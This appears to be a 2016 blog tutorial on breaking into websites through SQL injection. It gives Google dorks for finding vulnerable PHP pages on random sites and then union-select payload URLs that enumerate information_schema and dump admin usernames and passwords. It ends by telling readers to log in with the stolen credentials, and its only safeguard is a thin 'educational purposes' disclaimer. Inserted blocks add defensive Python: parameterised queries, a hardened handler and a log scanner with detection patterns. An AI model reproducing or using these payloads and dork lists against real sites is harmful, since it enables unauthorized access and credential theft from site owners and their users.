Thursday, 25 August 2016

Hacking a website using SQL Injection - step by step guide

Before learning how to exploit a website with SQL injection, let's first look at the core methodology and the abstraction behind the scenes.
What is SQL Injection?
SQL injection is an attack in which a malicious user injects SQL commands (commonly referred to as a malicious payload) through a web input field, so that they become part of the SQL statement the web application sends to its database (commonly a Relational Database Management System, RDBMS).

An SQL injection vulnerability can affect any website or web application that uses an SQL-based database. It is one of the most dangerous web attacks and one that malicious users commonly use to exploit web applications.

Malicious users can gain unauthorized access to the web application by using SQL injection to bypass the authentication and authorization mechanisms the application defines. The vulnerability can give them the ability to read, modify, update or delete the database, or to change particular rows and columns, so the integrity of the data in the SQL-based database is affected.

How does SQL injection work?
To exploit a web application, a malicious user must find an input field whose value ends up inside an SQL query sent to the database.

For an SQL injection attack to take place, the vulnerable website needs to put user input directly into the SQL statement it executes. The malicious user then supplies a payload that is included in the SQL query as-is, and that payload is what attacks the database server.

Before looking at the attack itself, consider how a typical server-side script checks a user's login input:
<?php
// read the submitted form fields
$Uname = $_POST['name'];
$Upassword = $_POST['password'];

// SQL query vulnerable to SQLi: the raw input is concatenated into the statement text
$sql = "SELECT id FROM users WHERE username = '$Uname' AND password = '$Upassword'";

// execute the query ($mysqli is an already open mysqli connection)
$result = $mysqli->query($sql);
This is an example of how a user's authentication credentials are checked or verified against the database.

As shown, the code above is vulnerable to SQL injection: a malicious user can gain access to the web application by submitting a payload that alters the SQL statement executed by the database server.

A simple example of an SQL injection payload could be something as simple as setting the password field to
password' OR '1'='1
where the added condition is always true.

This would result in the following SQL query being run against the database server:
SELECT id FROM users WHERE username='username' AND password='password' OR '1'='1'
Because OR '1'='1' is always true, the WHERE clause matches every row and the query returns a user id even though no valid password was supplied.
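The following is an added example, not code from the article: the same login check written twice in Python against an in-memory SQLite database (a stand-in for the MySQL back end), first with the string concatenation shown above and then with bound parameters. The users table, the sample accounts and the names login_vulnerable and login_safe are constructed for the example. Running it shows that the article's always-true payload returns a user id from the concatenated version and nothing from the parameterised one.

```python
import sqlite3


def make_user_db():
    """Constructed sample users table (in-memory SQLite). Real applications
    store a password hash, never the password itself; the plaintext column
    is kept only to mirror the article's snippet."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "correct-horse"), ("bob", "hunter2")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The article's pattern: user input pasted straight into the statement
    text, so quotes in the input change the structure of the query."""
    sql = (
        f"SELECT id FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same query with bound parameters: the driver sends the values
    separately from the statement, so quotes in them are just data."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_user_db()
    payload = "wrong' OR '1'='1"  # the always-true condition from the article
    print("concatenated query:", login_vulnerable(db, "alice", payload))  # a user id
    print("parameterised query:", login_safe(db, "alice", payload))       # None
```

Bound parameters are the fix because the statement text and the values travel separately; the database never parses the password as SQL. Escaping functions such as mysqli_real_escape_string are a weaker second choice and do nothing for unquoted numeric fields like the id parameter used later in this article.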
What’s the worst an attacker can do with SQL?
SQL (Structured Query Language) is the language used to work with databases, most commonly relational database management systems.

SQL can be used to update, modify or delete databases, or the tables, columns and rows within them.

That power cuts both ways: attackers can use the same language to exploit a web application's database and take control of the application without the administrator's consent.

With that in mind, the following points make it easier to understand how lucrative a successful SQL injection attack can be for an attacker.

  • An attacker can use SQL injection to bypass authentication or even impersonate specific users.
  • SQL is used to delete records from a database. So an attacker could use an SQL injection vulnerability to delete data from a database. Even if an appropriate backup strategy is employed, deletion of data could affect an application’s availability until the database is restored.
  • One of SQL’s primary functions is to select data based on a query and output the result of that query. An SQL injection vulnerability could allow the complete disclosure of data residing on a database server.
  • Since web applications use SQL to alter data within a database, an attacker could use SQL injection to alter data stored in a database. Altering data affects data integrity and could cause repudiation issues, for instance, issues such as voiding transactions, altering balances and other records.
  • Some database servers are configured (intentional or otherwise) to allow arbitrary execution of operating system commands on the database server. Given the right conditions, an attacker could use SQL injection as the initial vector in an attack of an internal network that sits behind a firewall.
Practical attack on a website with SQL injection:
The exploitation of a website using SQL injection is easier to follow if you already have some idea of what SQL injection is. So let's move on and look at a real environment.

We will proceed step by step to keep things simple.

Step 1
Search for Google dorks.

The following are some of the dorks I gathered. There are many more you can search for on your own.

inurl:”.php?cmd=”
inurl:”.php?z=”
inurl:”.php?q=”
inurl:”.php?search=”
inurl:”.php?query=”
inurl:”.php?searchstring=”
inurl:”.php?keyword=”
inurl:”.php?file=”
inurl:”.php?years=”
inurl:”.php?txt=”
inurl:”.php?tag=”
inurl:”.php?max=”
inurl:”.php?from=”
inurl:”.php?author=”
inurl:”.php?pass=”
inurl:”.php?feedback=”
inurl:”.php?mail=”
inurl:”.php?cat=”
inurl:”.php?vote=”
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=

These are some basic dorks, but you can make your own custom dorks to find websites.

Using such dorks you can quickly find sites that are likely to be vulnerable to SQL injection, and therefore whose authentication may be bypassed.

Step 2
Okay, once you have a number of candidate websites, open one of them to check whether it is actually still injectable.

In my case, I chose the following website for implementation of SQL injection.

www.xyz.com/products.php?id=2

Of course, this is a random placeholder site. Make sure you choose some other website.

Note: This is just for educational Purpose. I’ve nothing to do with your actions.

Let’s check whether the website I have chosen is vulnerable to SQL injection or not.

So paste the link in the address bar, add an apostrophe (') at the end of the link and press Enter.

If we get an error like the one below after pressing Enter, the website is vulnerable to SQL injection.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Good, the website is vulnerable, so move on and follow the steps.

Step 3
Now it's time to check how many columns the query behind this page selects. Make an arbitrary guess at the number of columns.

www.xyz.com/products.php?id=2 order by 34--

Append the clause to the URL exactly as shown, whatever the rest of your link looks like. ORDER BY sorts the result by the column at the given position; if that number is larger than the number of columns the query selects, the database raises an error, which is what turns it into a way of counting the columns. Here 34 is an arbitrary starting guess, and with it the following error is returned:
Unknown column '34' in 'order clause'
And if we put the link below in URL,

www.xyz.com/products.php?id=2 order by 33--

This one works correctly and we are redirected to the website's home page.

So the query behind this page selects 33 columns.
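Steps 2 and 3 both rely on the database's own error text reaching the browser. As an added illustration (not the article's code, and using Python with SQLite rather than PHP with MySQL), here is a products.php?id= style lookup in two forms: one that concatenates the parameter and echoes the raw database error, and a hardened one that rejects anything but a short string of digits, binds the value as a parameter and keeps error details in a server-side log. The products table, the SERVER_LOG list and the function names are constructed for the example.

```python
import sqlite3

SERVER_LOG = []  # constructed stand-in for the application's server-side log


def make_product_db():
    """Constructed sample products table in an in-memory SQLite database
    (a stand-in for the article's MySQL back end)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany(
        "INSERT INTO products (id, name) VALUES (?, ?)",
        [(1, "widget"), (2, "gadget")],
    )
    conn.commit()
    return conn


def fetch_product_vulnerable(conn, raw_id):
    """Mirrors a products.php?id=... handler that pastes the parameter into
    the statement and echoes the database's error text to the client. That
    echoed error is the signal Step 2 looks for, and the ORDER BY error is
    what lets the column count be found in Step 3."""
    sql = f"SELECT id, name FROM products WHERE id = {raw_id}"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return ("error", str(exc))  # leaks the database's error text to the user
    return ("ok", row) if row else ("not_found", None)


def fetch_product_safe(conn, raw_id):
    """Hardened handler: validate the input's shape, bind it as a parameter,
    and never show database error text to the client."""
    # 1. The id must be a short string of digits; anything else is rejected
    #    before it gets anywhere near the database.
    if not (raw_id.isdigit() and len(raw_id) <= 9):
        return ("error", "invalid product id")
    # 2. The value is bound, not concatenated, so it can only ever be a number.
    try:
        row = conn.execute(
            "SELECT id, name FROM products WHERE id = ?", (int(raw_id),)
        ).fetchone()
    except sqlite3.Error as exc:
        # 3. Detail goes to the server log; the client sees a generic message.
        SERVER_LOG.append(f"db error for id={raw_id!r}: {exc}")
        return ("error", "internal error")
    return ("ok", row) if row else ("not_found", None)


if __name__ == "__main__":
    db = make_product_db()
    for probe in ("2", "2'", "2 order by 34--", "2 order by 2--"):
        print(f"{probe!r:20} concatenated -> {fetch_product_vulnerable(db, probe)}")
        print(f"{'':20} hardened     -> {fetch_product_safe(db, probe)}")
```

Against the hardened handler the apostrophe probe and the ORDER BY probe are rejected by the shape check before any SQL runs, so there is no error text to read and no column count to discover. The generic message is also what you want in production, with the full exception kept in server logs for investigation.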

Step 4
Use the following query.

http://www.xyz.com/products.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--

This query makes the number 12 appear on the page (that column's value is rendered in the HTML), so in place of 12 you can write @@version, which displays the version of the database server used by the website.

http://www.xyz.com/products.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,@@version,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--

Step 5
Use the query below; note that group_concat(table_name) now takes the place of column 12 and that a FROM ... WHERE clause has been appended at the end.

http://www.xyz.com/products.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,group_concat(table_name),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 from information_schema.tables where table_schema=database()--

This query returns the names of the tables in the current database, concatenated into one string. Copy them if you need them later on.

Step 6
Use the query below to list the column names; it is the same query with table_name replaced by column_name and information_schema.tables replaced by information_schema.columns.
http://www.xyz.com/products.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,group_concat(column_name),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 from information_schema.columns where table_schema=database()--

After entering the query we get the column names of all the tables.

Step 7
In the previous step we got the column names, so look for the columns that hold credentials and can be used to retrieve sensitive data; for example, username and password are columns that would obviously give access to the application.

Use the following query:

http://www.xyz.com/products.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,group_concat(username,0x3a,password),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 from admin--

In the group_concat() call we passed username, then 0x3a (the hex code for a colon, used as a separator) and then the other column name. At the end, the information_schema clause is replaced by from admin, meaning that the columns are now read from the admin table.

Congratulations, you did it.

Search for the website login page and put the credentials in the fields.
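Each of the steps above leaves a distinctive trace in the web server's access log, which is what a defender should be watching for. The following is an added example, not part of the article: a small Python scanner over constructed Apache/nginx combined-format log lines that reproduce the Steps 2 to 5 requests against a placeholder host. The signature names, the sample lines and the threshold in suspicious_sources are all constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log lines in the Apache/nginx "combined" format. The
# addresses and paths are placeholders; the query strings reproduce the
# probes the article's Steps 2 to 5 send against products.php.
SAMPLE_LOG = r'''
203.0.113.7 - - [25/Aug/2016:10:00:01 +0000] "GET /products.php?id=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Aug/2016:10:00:05 +0000] "GET /products.php?id=2%27 HTTP/1.1" 500 612 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Aug/2016:10:00:09 +0000] "GET /products.php?id=2%20order%20by%2034-- HTTP/1.1" 500 612 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Aug/2016:10:00:20 +0000] "GET /products.php?id=null%20union%20all%20select%201,2,@@version%20from%20information_schema.tables-- HTTP/1.1" 200 5200 "-" "Mozilla/5.0"
198.51.100.4 - - [25/Aug/2016:10:01:00 +0000] "GET /search.php?q=order+form HTTP/1.1" 200 900 "-" "Mozilla/5.0"
'''

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each signature corresponds to one stage of the enumeration in the article.
SIGNATURES = [
    ("quote_probe",   re.compile(r"'(?:\s*--|\s*$|\s+or\s)", re.I)),
    ("order_by_enum", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select",  re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("schema_probe",  re.compile(r"\binformation_schema\b", re.I)),
    ("fingerprint",   re.compile(r"@@version|\bgroup_concat\s*\(", re.I)),
]


def decode_query(target):
    """Return the URL-decoded query string of a request target."""
    return unquote_plus(urlsplit(target).query)


def classify(query):
    """List the signature names that match a decoded query string."""
    return [name for name, rx in SIGNATURES if rx.search(query)]


def scan_log(text):
    """Parse combined-format lines and return one finding per request whose
    query string matches at least one signature."""
    findings = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines
        hits = classify(decode_query(m.group("target")))
        if hits:
            status = int(m.group("status"))
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "target": m.group("target"),
                "status": status,
                "hits": hits,
                # a 5xx right after an injection probe usually means the
                # database error reached the page: the Step 2 signal
                "db_error_suspected": status >= 500,
            })
    return findings


def suspicious_sources(findings, threshold=2):
    """Count flagged requests per client and keep those at or above the
    threshold; a single hit can be a false positive, a run of them is the
    enumeration pattern."""
    counts = Counter(f["ip"] for f in findings)
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f["ip"], f["status"], f["hits"], f["target"])
    print("sources to investigate:", suspicious_sources(found))
```

A single quote_probe hit is weak evidence (a search for a name containing an apostrophe looks the same), so the scanner reports per source and what matters is the sequence: a stray quote followed by a 5xx, then ORDER BY with changing numbers, then UNION SELECT against information_schema. That progression is exactly the enumeration in this article and is worth an alert on its own, even where every request returned 200.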

Final words:
To summarise the steps taken:

  • Searched for a vulnerable website with a Google dork.
  • Appended an apostrophe to the link to check whether it is vulnerable.
  • Found the number of columns the query selects.
  • Found the version of the database server.
  • Listed the table names.
  • Listed the column names of all the tables.
  • Chose the sensitive columns and fetched the data from them.
  • Found the login page of the website.
  • Used the recovered usernames and passwords to log in.

Note: The tutorial was for educational purposes.
